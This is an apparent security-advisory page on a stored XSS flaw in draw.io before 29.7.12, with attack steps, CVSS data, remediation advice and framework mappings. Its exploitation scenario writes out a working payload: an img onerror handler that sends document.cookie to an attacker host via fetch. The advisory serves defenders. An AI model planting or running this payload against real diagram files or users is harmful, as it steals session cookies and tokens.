CVE-2026-46642: stored XSS executes JS

CISO Take

draw.io versions before 29.7.12 contain a stored XSS vulnerability that allows arbitrary JavaScript execution in the editor's origin when a crafted .drawio file is opened — triggered automatically during import as cells are selected and the Text Format panel assigns raw cell labels to an unsanitized innerHTML context. For AI/ML teams that exchange architecture diagrams through draw.io (a common practice for documenting pipelines, model designs, and governance workflows), this creates a realistic lateral-movement path: a malicious diagram shared over email, Slack, or Confluence can silently exfiltrate session tokens or pivot to connected enterprise services. No public exploit or active exploitation has been confirmed (CISA KEV: No, EPSS: unavailable), but the CVSS scope:changed modifier signals that impact can extend beyond the draw.io process itself — particularly dangerous in self-hosted deployments integrated with SSO providers. Upgrade immediately to 29.7.12; until patched, treat externally received .drawio files as untrusted executables and restrict their opening in any web-deployed draw.io instance.

Sources: NVD GitHub Advisory ATLAS

What is the risk?

Medium severity (CVSS 6.1) with low attack complexity and no required privileges, constrained by mandatory user interaction (file open). The scope:changed flag is the primary risk amplifier: successful exploitation runs code in draw.io's browser origin, which may share sessions with identity providers or internal tooling. No active exploitation, no scanner coverage, and no public PoC reduce immediate urgency, but the trivial payload construction (a single img onerror tag) means exploitation requires minimal adversary skill. Risk is elevated for organizations using draw.io in collaborative AI/ML documentation workflows where external file sharing is routine.

How does the attack unfold?

Craft Malicious Diagram

Adversary creates a .drawio file with an XSS payload (`<img src=x onerror=...>`) in a cell label, disguised as a legitimate AI architecture or workflow diagram.

AML.T0011.000

Delivery

The crafted .drawio file is delivered to the target via email attachment, Slack file share, or uploaded to a Confluence space used by the AI/ML team.

AML.T0011

Exploitation

Victim opens the file; draw.io's import auto-selects cells and the Text Format panel assigns the raw cell label to a detached element's innerHTML, firing the img onerror handler.

AML.T0049

Credential and Session Theft

Arbitrary JavaScript executes in draw.io's origin, exfiltrating session cookies or authentication tokens to an attacker-controlled server, enabling pivot to connected enterprise services.

AML.T0050

Craft Malicious Diagram

Adversary creates a .drawio file with an XSS payload (`<img src=x onerror=...>`) in a cell label, disguised as a legitimate AI architecture or workflow diagram.

AML.T0011.000

Delivery

The crafted .drawio file is delivered to the target via email attachment, Slack file share, or uploaded to a Confluence space used by the AI/ML team.

AML.T0011

Exploitation

Victim opens the file; draw.io's import auto-selects cells and the Text Format panel assigns the raw cell label to a detached element's innerHTML, firing the img onerror handler.

AML.T0049

Credential and Session Theft

Arbitrary JavaScript executes in draw.io's origin, exfiltrating session cookies or authentication tokens to an attacker-controlled server, enabling pivot to connected enterprise services.

AML.T0050

How severe is it?

CVSS 3.1

6.1 / 10

EPSS

N/A

Exploitation Status

No known exploitation

Sophistication

Trivial

What is the attack surface?

AV Network

AC Low

PR None

UI Required

S Changed

C Low

I Low

A None

What should I do?

6 steps

Upgrade draw.io to version 29.7.12 or later immediately — this is the only complete fix.
If using the Confluence plugin or VS Code extension, verify the bundled draw.io version and update the integration package.
Until patched, block untrusted .drawio files from being opened in any web-deployed draw.io instance; enforce a file-review policy for externally received diagrams.
For detection: enable and monitor Content Security Policy (CSP) violation reports on your draw.io domain for unexpected script-src events.
Audit draw.io deployments for SSO or identity provider integrations and rotate any sessions that may have been exposed if anomalous activity is suspected.
In Confluence-integrated environments, restrict diagram editing to internal users until patched.

How is it classified?

Code Execution Data Extraction Framework AML.T0011 - User Execution AML.T0011.000 - Unsafe AI Artifacts AML.T0049 - Exploit Public-Facing Application AML.T0050 - Command and Scripting Interpreter

Which compliance frameworks are affected?

This CVE is relevant to:

EU AI Act

Article 15 - Accuracy, robustness and cybersecurity

ISO 42001

A.8.2 - Protection of AI system data and resources

NIST AI RMF

MANAGE 2.2 - Mechanisms for sustaining the value of AI systems via technical security practices

OWASP LLM Top 10

LLM05:2025 - Insecure Output Handling

Frequently Asked Questions

What is CVE-2026-46642?

draw.io versions before 29.7.12 contain a stored XSS vulnerability that allows arbitrary JavaScript execution in the editor's origin when a crafted .drawio file is opened — triggered automatically during import as cells are selected and the Text Format panel assigns raw cell labels to an unsanitized innerHTML context. For AI/ML teams that exchange architecture diagrams through draw.io (a common practice for documenting pipelines, model designs, and governance workflows), this creates a realistic lateral-movement path: a malicious diagram shared over email, Slack, or Confluence can silently exfiltrate session tokens or pivot to connected enterprise services. No public exploit or active exploitation has been confirmed (CISA KEV: No, EPSS: unavailable), but the CVSS scope:changed modifier signals that impact can extend beyond the draw.io process itself — particularly dangerous in self-hosted deployments integrated with SSO providers. Upgrade immediately to 29.7.12; until patched, treat externally received .drawio files as untrusted executables and restrict their opening in any web-deployed draw.io instance.

Is CVE-2026-46642 actively exploited?

No confirmed active exploitation of CVE-2026-46642 has been reported, but organizations should still patch proactively.

How to fix CVE-2026-46642?

1. Upgrade draw.io to version 29.7.12 or later immediately — this is the only complete fix. 2. If using the Confluence plugin or VS Code extension, verify the bundled draw.io version and update the integration package. 3. Until patched, block untrusted .drawio files from being opened in any web-deployed draw.io instance; enforce a file-review policy for externally received diagrams. 4. For detection: enable and monitor Content Security Policy (CSP) violation reports on your draw.io domain for unexpected script-src events. 5. Audit draw.io deployments for SSO or identity provider integrations and rotate any sessions that may have been exposed if anomalous activity is suspected. 6. In Confluence-integrated environments, restrict diagram editing to internal users until patched.

What systems are affected by CVE-2026-46642?

This vulnerability affects the following AI/ML architecture patterns: AI/ML system design and documentation workflows, Enterprise AI governance and compliance documentation, Collaborative ML pipeline design environments.

What is the CVSS score for CVE-2026-46642?

CVE-2026-46642 has a CVSS v3.1 base score of 6.1 (MEDIUM).

What is the AI security impact?

Affected AI Architectures

AI/ML system design and documentation workflowsEnterprise AI governance and compliance documentationCollaborative ML pipeline design environments

MITRE ATLAS Techniques

AML.T0011 User Execution

AML.T0011.000 Unsafe AI Artifacts

AML.T0049 Exploit Public-Facing Application

AML.T0050 Command and Scripting Interpreter

Compliance Controls Affected

EU AI Act: Article 15

ISO 42001: A.8.2

NIST AI RMF: MANAGE 2.2

OWASP LLM Top 10: LLM05:2025

What are the technical details?

Original Advisory

draw.io is a configurable diagramming and whiteboarding application. Prior to version 29.7.12, a crafted .drawio file can execute arbitrary JavaScript in the editor's origin when the file is opened. The vulnerability is not in the label sanitizer (which works correctly on the rendering path) but in a feature-detection routine in the Text Format panel that reads the raw cell label and assigns it to a detached element's innerHTML without sanitization. Browsers fire onerror for failed image loads even on detached elements, so an <img src=x onerror=...> payload in any cell label triggers script execution as soon as the cell is selected — which import does automatically. This issue has been patched in version 29.7.12.

Exploitation Scenario

An adversary targeting an AI/ML engineering team embeds the payload `<img src=x onerror='fetch("https://attacker.io/c?"+btoa(document.cookie))'>` in a cell label of a draw.io file disguised as a 'Q3 LLM Architecture Review' diagram. The file is sent via a phishing email or uploaded to a shared Confluence space. When a team member opens the file — either in the browser-based editor or via the Confluence plugin — draw.io's import routine auto-selects all cells, causing the Text Format panel's feature-detection code to read the raw cell label and assign it to a detached element's innerHTML. The browser fires the img onerror handler, exfiltrating the victim's session cookies to the attacker's server. If draw.io is deployed on the corporate network with SSO (Okta, Azure AD), those stolen tokens may grant access to additional internal services including CI/CD pipelines, model registries, or the AI governance platform.